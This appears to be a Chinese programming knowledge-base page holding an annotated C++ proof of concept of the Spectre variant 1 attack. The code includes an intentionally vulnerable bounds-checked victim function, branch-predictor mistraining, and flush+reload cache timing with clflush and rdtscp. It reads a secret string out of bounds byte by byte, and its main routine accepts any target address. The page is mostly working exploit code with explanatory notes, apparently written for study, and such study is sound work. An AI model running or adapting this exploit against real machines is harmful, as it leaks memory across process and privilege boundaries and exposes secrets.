[C++知识库] spectre 记录

开发: C++知识库 Java知识库 JavaScript Python PHP知识库人工智能区块链大数据移动开发嵌入式开发工具数据结构与算法开发测试游戏开发网络协议系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑笔记本显卡显示器固态硬盘硬盘耳机手机 iphone vivo oppo 小米华为单反装机图拉丁

-> C++知识库 -> spectre 记录 -> 正文阅读

[C++知识库]spectre 记录

spectre 记录

- - v1

v1

#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#ifdef _MSC_VER
#include <intrin.h> /* for rdtscp and clflush */
#pragma optimize("gt", on)
#else
#include <x86intrin.h> /* for rdtscp and clflush   GCC 内置函数集（针对 x86 平台） */
#endif
#include<thread>
#include<time.h>
/*
参考博客
[非易失内存编程] 通过编译器内置函数 (Intrinsic Functions) 发射 CLFLUSH、CLFLUSHOPT
https://blog.csdn.net/maokelong95/article/details/81362837 

Spectre 攻击详解 https://zhuanlan.zhihu.com/p/33635193
https://meltdownattack.com/

Flush-Reload 方式完成 Side-channel attack https://zhuanlan.zhihu.com/p/32848483 

解读 Meltdown & Spectre CPU 漏洞 https://zhuanlan.zhihu.com/p/32757727
*/
/********************************************************************
 Victim code.
 ********************************************************************/

// 数组1大小 16
// unsigned int array1_size = 16;
// const unsigned int array1_size = 16;
volatile const unsigned int array1_size = 16;
// volatile  unsigned int array1_size = 16;
#define BIT 4096

// typedef unsigned char unint8
uint8_t unused1[64];
/***
 * array1代表了受害者和攻击者之间的共享内存空间，但这只是一个例子：它的另一种代码大小可以正常工作
 * array1被两个未使用的数组包围：这些数组对于确保命中不同的缓存路径是很有用的。在许多处理器L1缓存每一路径有64个字节
 */
uint8_t array1[160] = {1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16};
uint8_t unused2[64];
uint8_t array2[256 * BIT];


// 假设攻击者想要恢复的数据
char *secret = "The Magic Words are Squeamish Ossifrage.";

uint8_t temp = 0; /* To not optimize out victim_function() */

/*
1. 读取array1_size。这一操作会导致缓存丢失。
2. 尽管处理器正抓取array1_size——由于存在缓存缺失，array1_size是“长”的——但是分支预测器假设它是正确的(不正确的猜测)。
3. 推测读取array1[x]。该读取非常快速，因为它是缓存命中。
4. 读取array2[array1[x]* BIT]。读取时间很长(缓存缺失)。
5. 虽然步骤4中的读取正在等待，但是步骤1的值已经到达。处理器检测到其猜测不正确，并重新调整了自身状态。
*/
void victim_function(size_t x){
	if (x < array1_size){
		temp &= array2[array1[x] * BIT];
		// array2[array1[x] * BIT] + 1; 
		// array2[array1[x] * BIT] ++ ; // 自增是可以的 a = a+1 ; a++ ; 
		// uint8_t temp1 = array2[array1[x] * BIT]; 
		// array2[array1[x] * BIT]; uint8_t ccc = 1 ; 无效
		// size_t inx =  array1[x] * BIT;  uint8_t temp3 = array2[inx] ; // 有效
		// size_t inx =  array1[x] * BIT;  uint8_t temp3 = array2[array1[x]] ; // 无效
	}
}

/********************************************************************
 Analysis code
 ********************************************************************/
#define CACHE_HIT_THRESHOLD (80) /* cache hit if time <= threshold阈值 */

/* 
Report best guess in value[0] and runner-up in value[1] 
该函数将尝试猜测位于给定地址的值。对于所有可能的字节值(有256个)，该函数将测试使用Flush+Reload缓存攻击访问该值所需的时间。
各种时序存储在results表中，但是函数只返回了两个最佳猜测
*/
void readMemoryByte(size_t malicious_x, uint8_t value[2],int score[2]){
	static int results[256];
	int tries, i, j, k, mix_i;
	unsigned int junk = 0;
	size_t training_x, x; // typedef unsigned long long size_t
	register uint64_t time1, time2;
	volatile uint8_t *addr;
	for (i = 0; i < 256; i++)	results[i] = 0;
	for (tries = 999; tries > 0; tries--){
		/* Flush array2[256*(0..255)] from cache */
		for (i = 0; i < 256; i++) {
			/*GCC 内置的 clflush
				CLFLUSH（Cache Line Flush，缓存行刷回）能够把指定缓存行（Cache Line）从所有级缓存中淘汰，若该缓存行中的数据被修改过，则将该数据写入主存；
				支持现状：目前主流处理器均支持该指令
				void _mm_clflush (void const* p) 从缓存层次结构的所有级别中使包含 p 的缓存行无效并刷新 
				首先，从一个纯净的状态开始，删除了整个array2表。该表是与攻击者共享的，它需要能够存储256个不同的缓存线路。而缓存线路的大小是BIT位
			*/ 
			_mm_clflush(&array2[i * BIT]); 
		}
		/* 5 trainings (x=training_x) per attack run (x=malicious_x) */
		training_x = tries % array1_size;
		for (j = 29; j >= 0; j--){
			_mm_clflush((const int *) &array1_size);
			/*volatile: 
			A volatile specifier is a hint to a compiler that an object may change its value in ways not specified by the language so that aggressive optimizations must be avoided
			通常用于建立语言级别的 memory barrier
			编译器对访问该变量的代码就不再进行优化，从而可以提供对特殊地址的稳定访问,系统总是重新从它所在的内存读取数据，即使它前面的指令刚刚从该处读取过数据。而且读取的数据立刻被保存
			用来确保刷新完成的，处理器不会重新排序
			*/
			for (volatile int z = 0; z < 100; z++){} 
			/* Delay (can also mfence) */
			x = ((j % 6) - 1) & ~ 0xFFFF;/* Set x=FFF.FF0000 if j%6==0, else x=0 */
			x = (x | (x >> 16)); /* Set x=-1 if j&6=0, else x=0 */
			x = training_x ^ (x & (malicious_x ^ training_x));  // training_x < 0x000F 
            // 上面三行等价于
			// x = j%6?training_x:malicious_x; 
			// for(int xx = 0 ; xx < 100; xx++ ) ;  //使用一定的for循环可以减少 上面j%6? 的 分支判断影响，可能是加强预测正确的判断
			// printf("j=%d training_x = %d, x = %d \n", j, training_x,x);
			victim_function(x); /* Call the victim! */
		}

		/* Time reads. Mixed-up order to prevent stride prediction 防止步幅预测的混合顺序 */
		for (i = 0; i < 256; i++){
			mix_i = ((i * 167) + 13) & 255; // 计算缓存线路的地址来进行检查
			addr = &array2[mix_i * BIT];
			/*
			unsigned __int64 __rdtscp (unsigned int * mem_addr)
			Copy the current 64-bit value of the processor's time-stamp counter into dst, and store the IA32_TSC_AUX MSR (signature value) into memory at mem_addr.
			将处理器时间戳计数器的当前 64 位值复制到 dst 中，并将 IA32_TSC_AUX MSR（签名值）存储到内存中的 mem_addr
			*/
			time1 = __rdtscp(&junk);
			junk = *addr;					 /* Time memory access */
			time2 = __rdtscp(&junk) - time1; /* Compute elapsed time */
			if (time2 <= CACHE_HIT_THRESHOLD && mix_i != array1[tries % array1_size])	results[mix_i]++; /* cache hit -> score +1 for this value */
		}

		/* Locate highest j & second-highest k results */
		j = k = results[0];
		for (i = 1; i < 256; i++){
			if (results[i] >= results[j]){
				k = j;
				j = i;
			}	else if (results[i] >= results[k]){
				k = i;
			}
		}
		if (results[j] >= (2 * results[k] + 5) ||(results[j] == 2 && results[k] == 0))
			break; /* Success if best is > 2*runner-up + 5 or 2/0) */
	}
	/* use junk to prevent code from being optimized out 使用junk来防止代码被优化掉*/
	// results[0] ^= junk;
	value[0] = (uint8_t)j;
	score[0] = results[j];
	value[1] = (uint8_t)k;
	score[1] = results[k];
}

/** printf 格式化参数
 *  X：Unsigned hexadecimal integer (uppercase)
 *  p: Pointer address
 */
/**
 * void* 一个通用指针，可以指向任意类型的指针
 * 指针有两个属性：指向变量/对象的地址和长度，但是指针指存储被指向变量的地址，长度则取决于指针的类型
 * 
 * argc = argument count ：表示传入main函数的数组元素个数 
 * argv = argument vector ：表示传入main函数的指针数组，为char**类型,
 * 第一个数组元素argv[0]是程序名称，并且包含程序所在的完整路径。argc至少为1，即argv数组至少包含程序名
 * 一般编译器默认使用argc和argv两个名称作为main函数的参数，但这两个参数如此命名并不是必须的
 */
int main(int argc, const char **argv) {
	size_t malicious_x = (size_t)(secret - (char *)array1); /* default for malicious_x */
	printf("secret address = %p,array1 address = %p, minus malicious_x=  %p\n", (void *)secret,(void *)array1, (void *)malicious_x);
	int i, score[2], len = 40;
	uint8_t value[2];

	for (i = 0; i < sizeof(array2); i++)
		array2[i] = 1; /* write to array2 to ensure it is memory backed 支持 */
	if (argc == 3){
		sscanf(argv[1], "%p", (void **)(&malicious_x));
		malicious_x -= (size_t)array1; /* Input value to pointer */
		sscanf(argv[2], "%d", &len);
		printf("Trying malicious_x = %p, len = %dn", (void *)malicious_x, len);
	}
	printf("Reading %d bytes:\n", len);
	clock_t start = clock();
	while (--len >= 0){
		// std::this_thread::sleep_for(std::chrono::milliseconds(1000));
		readMemoryByte(malicious_x++, value, score);
		printf("Reading at malicious_x = %p... ", (void *)malicious_x);
		printf("%s: ", score[0] >= 2 * score[1] ? "Success" : "Unclear");
		// 不是显示字符输出 ?
 		printf("0x%02X='%c' score=%d ", value[0], (value[0] > 31 && value[0] < 127 ? value[0] : '?'), score[0]);
 		if (score[1] > 0)
	 		printf("(second best: 0x%02X score=%d)", value[1], score[1]);
 		printf("\n");
	}
	clock_t end = clock();
	// printf("%.6f \n",(end-start + 0.0)/CLOCKS_PER_SEC);
	return (0);
}